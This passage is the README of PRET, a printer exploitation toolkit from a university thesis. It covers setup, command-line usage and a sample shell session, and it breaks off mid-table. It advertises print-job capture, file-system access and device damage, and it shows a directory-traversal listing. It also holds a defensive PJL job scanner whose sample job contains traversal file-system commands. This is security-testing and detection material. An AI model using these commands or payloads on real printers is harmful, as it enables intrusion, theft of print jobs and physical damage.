## PRET - Printer Exploitation Toolkit
**Is your printer secure? Check before someone else does...**
PRET is a new tool for printer security testing developed in the scope of a [Master's Thesis](http://nds.rub.de/media/ei/arbeiten/2017/01/13/exploiting-printers.pdf) at Ruhr University Bochum. It connects to a device via network or USB and exploits the features of a given printer language. Currently [PostScript](https://www.adobe.com/products/postscript/pdfs/PLRM.pdf), [PJL](http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf) and [PCL](http://www.hp.com/ctg/Manual/bpl13210.pdf) are supported which are spoken by most laser printers. This allows cool stuff like capturing or manipulating print jobs, accessing the printer's file system and memory or even causing physical damage to the device. All attacks are documented in detail in the [Hacking Printers Wiki](http://hacking-printers.net/wiki/).
The main idea of PRET is to facilitate the communication between the end-user and the printer. Thus, after entering a UNIX-like command, PRET translates it to PostScript, PJL or PCL, sends it to the printer, evaluates the result and translates it back to a user-friendly format. PRET offers a whole bunch of commands useful for printer attacks and fuzzing.
![PRET design](img/architecture.png)
### Installation
PRET only requires a Python2 interpreter. For colored output and SNMP support however, third party modules need to be installed:
```
# pip install colorama pysnmp
```
If running on a Windows console and Unicode characters are not displayed correctly, install the *win_unicode_console* module:
```
# pip install win_unicode_console
```
For experimental, ‘driverless’ printing (see print command), ImageMagick and GhostScript need to be installed:
```
# apt-get install imagemagick ghostscript
```
### Usage
```
usage: pret.py [-h] [-s] [-q] [-d] [-i file] [-o file] target {ps,pjl,pcl}
positional arguments:
target printer device or hostname
{ps,pjl,pcl} printing language to abuse
optional arguments:
-h, --help show this help message and exit
-s, --safe verify if language is supported
-q, --quiet suppress warnings and chit-chat
-d, --debug enter debug mode (show traffic)
-i file, --load file load and run commands from file
-o file, --log file log raw data sent to the target
```
###### Example usage:
```
$ ./pret.py laserjet.lan ps
$ ./pret.py /dev/usb/lp0 pjl
```
###### Positional Arguments:
PRET requires a valid target and a printer language as arguments. The target can either be the IP address/hostname of a network printer (with port 9100/tcp open) or a device like `/dev/usb/lp0` for a local USB printer. To quickly discover all network printers in your subnet using SNMP broadcast, simply run PRET without arguments:
```
./pret.py
No target given, discovering local printers
address device uptime status
───────────────────────────────────────────────────────────────────────────────
192.168.1.5 hp LaserJet 4250 10:21:49 Ready
192.168.1.11 HP LaserJet M3027 MFP 13 days Paper jam
192.168.1.27 Lexmark X792 153 days Ready
192.168.1.28 Brother MFC-7860DW 16:31:17 Sleep mode
```
The printer language to be abused must be one of `ps`, `pjl` or `pcl`. Not all languages are supported by every printer, so you may want to switch languages if you don't receive any feedback. Each printer language is mapped to a different set of PRET commands and has different capabilities to exploit.
###### Optional Arguments:
`--safe` tries to check via IPP, HTTP and SNMP if the selected printing language (PS/PJL/PCL) is actually supported by the device before connecting. On non-networked printers (USB, parallel cable) this test will fail.

`--quiet` suppresses printer model determination, intro message and some other chit-chat.

`--debug` shows the datastream actually sent to the device and the feedback received. Note that header data and other overhead is filtered. To see the whole traffic, use Wireshark. Debugging can also be switched on/off within a PRET session using the `debug` command.

`--load filename` reads and executes PRET commands from a text file. This is useful for automation. Command files can also be invoked later within a PRET session via the `load` command.

`--log filename` writes a copy of the raw datastream sent to the printer into a file. This can be useful to build a malicious print job file which can be deployed on another printer not directly reachable, for example by printing it from a USB drive.
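
A defender's counterpart to the `--log` note above, added here as an example (Python 3, not part of PRET): it flags PJL file-system commands and `..` path components in a print job file before the job is released to a printer. The PJL command names are taken from HP's PJL Technical Reference; the function name and both sample jobs are constructed for illustration.

```python
import re

# PJL file-system commands from HP's PJL Technical Reference.
PJL_FS_COMMANDS = {"FSAPPEND", "FSDELETE", "FSDIRLIST", "FSDOWNLOAD",
                   "FSINIT", "FSMKDIR", "FSQUERY", "FSUPLOAD"}
UEL = b"\x1b%-12345X"  # Universal Exit Language sequence framing a PJL job

PJL_LINE = re.compile(rb"@PJL[ \t]+([A-Z]+)([^\r\n]*)", re.IGNORECASE)
NAME_ARG = re.compile(rb'NAME\s*=\s*"([^"]*)"', re.IGNORECASE)


def audit_print_job(data: bytes):
    """Return (offset, command, path, traversal) for each PJL FS command."""
    findings = []
    for m in PJL_LINE.finditer(data):
        command = m.group(1).decode("ascii").upper()
        if command not in PJL_FS_COMMANDS:
            continue  # JOB, SET, ENTER LANGUAGE etc. are normal job control
        name = NAME_ARG.search(m.group(2))
        path = name.group(1).decode("latin-1") if name else ""
        # A ".." component means the path leaves the volume's intended root.
        traversal = ".." in path.replace("\\", "/").split("/")
        findings.append((m.start(), command, path, traversal))
    return findings


# Constructed sample jobs (not captured from a real device).
BENIGN_JOB = (UEL + b'@PJL JOB NAME="report"\r\n@PJL SET COPIES=2\r\n'
              b"@PJL ENTER LANGUAGE=PCL\r\n\x1bE page data \x1bE" + UEL)
SUSPECT_JOB = (UEL + b'@PJL FSDIRLIST NAME="0:\\..\\..\\" ENTRY=1 COUNT=99\r\n'
               b'@PJL FSUPLOAD NAME="0:/../../.profile" OFFSET=0 SIZE=834\r\n'
               b'@PJL FSDOWNLOAD FORMAT:BINARY SIZE=4 NAME="0:/fonts/a.pfa"\r\n'
               b"data" + UEL)

if __name__ == "__main__":
    for label, job in (("benign", BENIGN_JOB), ("suspect", SUSPECT_JOB)):
        for offset, command, path, traversal in audit_print_job(job):
            flag = "TRAVERSAL" if traversal else "fs-access"
            print(f"{label}: offset={offset} {command} {path!r} [{flag}]")
```

Ordinary print jobs rarely need any `FS*` command, so a print server or spool filter can treat every finding as worth review and the traversal flag as a reason to reject the job.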
### Generic Commands
After connecting to a printer device, you will see the PRET shell and can execute various commands:
```
$ ./pret.py laserjet.lan pjl
________________
_/_______________/|
/___________/___//|| PRET | Printer Exploitation Toolkit v0.25
|=== |----| || by Jens Mueller <jens.a.mueller@rub.de>
| | ô| ||
|___________| ô| ||
| ||/.´---.|| | || 「 cause your device can be
|-||/_____\||-. | |´ more fun than paper jams 」
|_||=L==H==||_|__|/
(ASCII art by
Jan Foerster)
Connection to laserjet.lan established
Device: hp LaserJet 4250
Welcome to the pret shell. Type help or ? to list commands.
laserjet.lan:/> help
Available commands (type help <topic>):
=======================================
append debug edit free id ls open restart timeout
cat delete env fuzz info mirror printenv selftest touch
cd df exit get load mkdir put set traversal
chvol disable find help lock nvram pwd site unlock
close display format hold loop offline reset status version
laserjet.lan:/> ls ../../
- 834 .profile
d - bin
d - dev
d - etc
d - hp
d - hpmnt
- 1276 init
d - lib
d - pipe
d - tmp
laserjet.lan:/> exit
```
A list of generic PRET commands is given below:
```
help List available commands or get detailed help with 'help cmd'.
debug Enter debug mode. Use 'hex' for hexdump: debug [hex]
load Run commands from file: load cmd.txt
loop Run command for multiple arguments: loop <cmd> <arg1> <arg2> …
open Connect to remote device: open <target>
close Disconnect from device.
timeout Set connection timeout: timeout <seconds>
discover Discover local printer devices via SNMP.
print Print image file or raw text: print <file>|"text"
site Execute custom command on printer: site <command>
exit Exit the interpreter.
```
Generic file system operations with a PS/PJL/PCL specific implementation are:
```
┌───────────┬─────┬─────┬─────┬────────────────────────────────────────┐
│ Command │ PS │ PJL │ PCL │ Description │
├───────────┼─────┼─────┼─────┼────────────────────────────────────────┤
│ ls │ ✓ │ ✓ │ ✓ │ List contents of remote directory. │
│ get │ ✓ │ ✓ │ ✓ │ Receive file: get <file> │
│ put │ ✓ │ ✓ │ ✓ │ Send file: put <local file> │
│ append │ ✓ │ ✓ │ │ Append to file: append <file> <str> │
│ delete │ ✓ │ ✓ │ ✓ │ Delete remote file:
```